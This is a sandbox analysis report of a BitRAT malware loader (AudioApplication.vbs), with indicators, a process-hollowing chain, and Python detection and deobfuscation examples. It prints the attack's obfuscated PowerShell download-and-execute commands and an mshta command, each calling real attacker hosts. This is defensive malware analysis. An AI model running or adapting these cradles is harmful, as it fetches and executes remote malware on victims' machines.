AudioApplication.vbs

General

Target      AudioApplication.vbs
Filesize    3KB
Completed   19-01-2022 07:09
Score       10/10
MD5         257cb7d47ef7b5221bd8d95cbdd7f47e
SHA1        0f4cb975fbaf27684908503de9476a2d02646734
SHA256      b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9

Malware Config

Extracted
  Language: hta
  URLs (hta.dropper):
    http://185.7.214.7/BITRA/oo.html

Extracted
  Language: ps1 (deobfuscated)
  URLs (ps1.dropper):
    http://185.7.214.7/BITRA/AU.PNG

Extracted
  Language: ps1 (deobfuscated)
  URLs (ps1.dropper):
    http://185.7.214.7/BITRA/YES.PNG

Extracted
  Family: bitrat
  Version: 1.38
  C2: 185.7.214.8:4884
  Attributes
    communication_password: 311f4e4b7562e9d5ba31bd6afa686479
    tor_process: tor

Note that the two .PNG URLs are classified as ps1.dropper: they return PowerShell, not images. The staging host (185.7.214.7) and the BitRAT C2 (185.7.214.8:4884) are adjacent addresses but distinct; both belong on the block list.
Signatures 11

  • BitRAT

    Description

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Blocklisted process makes network request
    mshta.exe, powershell.exe, powershell.exe

    Reported IOCs

    flow  pid   process
    4     516   mshta.exe
    5     1992  powershell.exe
    6     2020  powershell.exe
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Reported IOCs

    resource                                                                      yara_rule
    behavioral1/memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp  upx
    behavioral1/memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp  upx
    behavioral1/memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp  upx
    behavioral1/memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp  upx
    behavioral1/memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp  upx

    All five hits are dumps of the same 0x400000-0x7E4000 region of RegSvcs.exe (PID 1768), the process that powershell.exe (PID 1992) wrote into. The UPX-packed image is therefore the injected payload, not the on-disk RegSvcs.exe; the 1768-* dumps under Downloads are where to look for the unpacked BitRAT sample.
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    RegSvcs.exe

    Reported IOCs

    pid   process
    1768  RegSvcs.exe  (4 occurrences)
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    description                          pid   process         target process
    PID 1992 set thread context of 1768  1992  powershell.exe  RegSvcs.exe

    Taken together with the WriteProcessMemory events from 1992 into 1768 and the UPX-packed image found at 0x400000 in RegSvcs.exe, this is consistent with process hollowing: powershell.exe spawns the signed .NET utility RegSvcs.exe, writes the payload into it and redirects its thread to the new image.
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature reads "likely ransomware behaviour"; in this sample, identified above as BitRAT, drive enumeration is better read as host discovery by the RAT.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    description  ioc                                                                                                             process
    Key created  \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

    mshta.exe hosts the MSHTML (Internet Explorer) engine, so this key is a side effect of loading the remote HTA rather than a deliberate settings change by the malware; the useful indicator here is mshta.exe fetching http://185.7.214.7/BITRA/oo.html at all.
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, powershell.exe

    Reported IOCs

    pid   process
    1992  powershell.exe
    2020  powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, powershell.exe, RegSvcs.exe

    Reported IOCs

    description                 pid   process
    Token: SeDebugPrivilege     1992  powershell.exe
    Token: SeDebugPrivilege     2020  powershell.exe
    Token: SeDebugPrivilege     1768  RegSvcs.exe
    Token: SeShutdownPrivilege  1768  RegSvcs.exe
  • Suspicious use of SetWindowsHookEx
    RegSvcs.exe

    Reported IOCs

    pid   process
    1768  RegSvcs.exe  (2 occurrences)
  • Suspicious use of WriteProcessMemory
    WScript.exe, mshta.exe, powershell.exe

    Reported IOCs

    description                       pid   process         target process  events
    PID 524 wrote to memory of 516    524   WScript.exe     mshta.exe       3
    PID 516 wrote to memory of 2020   516   mshta.exe       powershell.exe  3
    PID 516 wrote to memory of 1992   516   mshta.exe       powershell.exe  3
    PID 1992 wrote to memory of 1768  1992  powershell.exe  RegSvcs.exe     11

    The three writes from each parent into its newly created child are what process creation itself produces. The eleven writes from powershell.exe (1992) into RegSvcs.exe (1768), paired with the SetThreadContext call above, are the payload injection.
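The signature tables above describe the chain WScript.exe > mshta.exe > powershell.exe > RegSvcs.exe. The Python below is an added example, not part of the sandbox report, that turns the behaviours reported here into process-creation rules and runs them over the chain reconstructed as constructed events (PIDs, images and command lines as recorded in the process tree; the PowerShell command lines are shortened to the tokens the rules key on, and the parent of WScript.exe, which the report does not show, is set to 0). The rule names, the `ProcEvent` layout and the inclusion of regasm.exe beside regsvcs.exe are the example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    chain: str   # ancestry, oldest first


# Constructed sample: the process tree from this report. The PowerShell cradle is
# shortened to the obfuscation tokens the rules look at; ppid 0 = parent not recorded.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS_CRADLE = "$c1='({end}{end}Ne{end}w-Obj{end}ect'.replace('{end}', '');$JI=($c1 -Join '');I`E`X $JI|I`E`X"
SAMPLE_EVENTS = [
    ProcEvent(524, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"'),
    ProcEvent(516, 524, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html'),
    ProcEvent(2020, 516, PS, f'"{PS}" {PS_CRADLE}'),
    ProcEvent(1992, 516, PS, f'"{PS}" -noexit {PS_CRADLE}'),
    ProcEvent(1768, 1992, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
]

# .NET framework utilities that are commonly hollowed; regasm.exe is an assumption
# added for generality, only regsvcs.exe appears in this report.
DOTNET_LOLBINS = {"regsvcs.exe", "regasm.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def args_after_image(cmdline: str) -> str:
    """Drop the (optionally quoted) image token; whatever remains is the argument string."""
    m = re.match(r'^(?:"[^"]*"|\S+)\s*', cmdline)
    return cmdline[m.end():].strip() if m else cmdline.strip()


def strip_backticks(cmdline: str) -> str:
    """PowerShell treats ` as an escape, so I`E`X tokenises as IEX; collapse before matching."""
    return cmdline.replace("`", "")


def rule_mshta_remote(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # mshta.exe handed an http(s) URL: remote HTA execution.
    return basename(e.image).lower() == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I) is not None


def rule_powershell_iex_cradle(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    if basename(e.image).lower() != "powershell.exe":
        return False
    return re.search(r"\biex\b|invoke-expression|downloadstring|net\.webclient",
                     strip_backticks(e.cmdline), re.I) is not None


def rule_powershell_token_obfuscation(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    if basename(e.image).lower() != "powershell.exe":
        return False
    backtick_in_word = re.search(r"[A-Za-z]`[A-Za-z]", e.cmdline)            # I`E`X
    strip_replace = re.search(r"\.replace\('[^']+',\s*''\)", e.cmdline, re.I)  # '...'.replace('{end}', '')
    return bool(backtick_in_word or strip_replace)


def rule_dotnet_utility_from_powershell(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    # A .NET utility started by PowerShell with no arguments does nothing useful on its own;
    # that is the shape of a hollowing target.
    return (parent is not None
            and basename(parent.image).lower() == "powershell.exe"
            and basename(e.image).lower() in DOTNET_LOLBINS
            and args_after_image(e.cmdline) == "")


RULES = [
    ("mshta_remote_hta", rule_mshta_remote),
    ("powershell_iex_cradle", rule_powershell_iex_cradle),
    ("powershell_token_obfuscation", rule_powershell_token_obfuscation),
    ("dotnet_utility_spawned_by_powershell", rule_dotnet_utility_from_powershell),
]


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> str:
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # `seen` guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(chain))


def detect(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        for name, rule in RULES:
            if rule(e, parent):
                findings.append(Finding(name, e.pid, ancestry(e.pid, by_pid)))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:40} pid={f.pid:<5} {f.chain}")
```

The chain string is what makes the last rule actionable: a bare RegSvcs.exe under powershell.exe under mshta.exe is a different triage priority from RegSvcs.exe under a build tool.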
Processes 5
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"
    Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:2020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        Blocklisted process makes network request
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of SetWindowsHookEx
          PID:1768
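Both PowerShell command lines build their download cradle from three single-quoted fragments padded with a `{end}` placeholder that `.replace('{end}', '')` strips at run time, `-Join` them, and pass the result to `I`E`X` (Invoke-Expression) twice: the first IEX evaluates the string into `(New-Object Net.WebClient).DownloadString(...)`, the second executes whatever that download returns, which the Malware Config above identifies as the ps1.dropper stage. The Python below is an added example, not part of the sandbox report, that reproduces that evaluation statically so the URL can be recovered without running the script; the sample command line is the one recorded for PID 2020, and the regexes only handle the `'...'.replace('x','')` and `-Join ''` idioms seen here.

```python
import re

# Constructed sample: the command line recorded for PID 2020 above, minus the
# leading quoted powershell.exe path.
SAMPLE_CMDLINE = (
    "$c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); "
    "$c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); "
    "$c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');"
    "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# $name='<single-quoted literal>'.replace('<junk>', '')  ('' inside the literal is an escaped quote)
ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'\.replace\('([^']*)',\s*''\)", re.I)
# $out=($a,$b,$c -Join '')
JOIN_RE = re.compile(r"\$(\w+)=\(((?:\$\w+,?)+)\s+-join\s+''\)", re.I)


def unquote_ps_literal(body: str) -> str:
    """Undo PowerShell single-quoted-string escaping: '' -> '."""
    return body.replace("''", "'")


def recover_fragments(cmdline: str) -> dict:
    """Evaluate each  $x='...'.replace('junk','')  statement the way PowerShell would."""
    fragments = {}
    for name, body, junk in ASSIGN_RE.findall(cmdline):
        fragments[name] = unquote_ps_literal(body).replace(junk, "")
    return fragments


def recover_payload(cmdline: str) -> str:
    """Reassemble the string handed to the first Invoke-Expression, in -Join order."""
    fragments = recover_fragments(cmdline)
    m = JOIN_RE.search(cmdline)
    order = re.findall(r"\$(\w+)", m.group(2)) if m else list(fragments)
    return "".join(fragments[name] for name in order)


def strip_backtick_escapes(token: str) -> str:
    """I`E`X -> IEX. Escape sequences such as `n are not handled; none occur in this sample."""
    return token.replace("`", "")


def extract_urls(text: str) -> list:
    return re.findall(r"https?://[^\s'\")]+", text)


if __name__ == "__main__":
    payload = recover_payload(SAMPLE_CMDLINE)
    print(payload)
    print(extract_urls(payload))
```

Applying it to the PID 1992 command line (which differs only in `-noexit` and the YES.PNG URL) yields the second ps1.dropper URL listed under Malware Config; the same fragment-and-join shape is worth matching on its own, since the junk token and the variable names are trivially changed between builds.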
Network
MITRE ATT&CK Matrix

Tactics with techniques mapped by the signatures above:
  • Defense Evasion: Modify Registry (mshta.exe creates an Internet Explorer settings key)
  • Discovery: System Information Discovery (enumeration of physical storage devices)
Downloads
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5     491e4953bc08a51d076eea36b52fe963
    SHA1    cb05518529a74566781411bc61ba1c2415613c71
    SHA256  19f295480e74354e858c88c4e78b4942ebe3095488a55dd1dee277f287bb5037
    SHA512  a4a3ea21092a4780004db1db77e2a09bb2d2dfe5688ca2dfadf56be4ca44934c5b759ec09a03d9b44df7b4c6ec8508c877d8ae6bd1993e5216a5cdd26dce95b3
    (a Windows jump-list entry written when the .vbs was opened; a host artifact, not a payload)
  • memory/524-53-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
  • memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-73-0x0000000075531000-0x0000000075533000-memory.dmp
  • memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-68-0x0000000000400000-0x00000000007E4000-memory.dmp
  • memory/1768-75-0x0000000000401000-0x00000000007E4000-memory.dmp
  • memory/1992-63-0x0000000002642000-0x0000000002644000-memory.dmp
  • memory/1992-66-0x000000000264B000-0x000000000266A000-memory.dmp
  • memory/1992-59-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp
  • memory/1992-65-0x0000000002644000-0x0000000002647000-memory.dmp
  • memory/1992-61-0x0000000002640000-0x0000000002642000-memory.dmp
  • memory/2020-60-0x00000000025F0000-0x00000000026F2000-memory.dmp
  • memory/2020-64-0x00000000026F4000-0x00000000026F7000-memory.dmp
  • memory/2020-58-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp
  • memory/2020-62-0x00000000026F2000-0x00000000026F4000-memory.dmp
  • memory/2020-67-0x00000000026FB000-0x000000000271A000-memory.dmp

Dump names are pid-index-start-end. 524 is WScript.exe, 516 mshta.exe (no dumps), 1992 and 2020 the two powershell.exe, 1768 RegSvcs.exe; the 1768 dumps of 0x400000-0x7E4000 are the UPX-flagged injected image.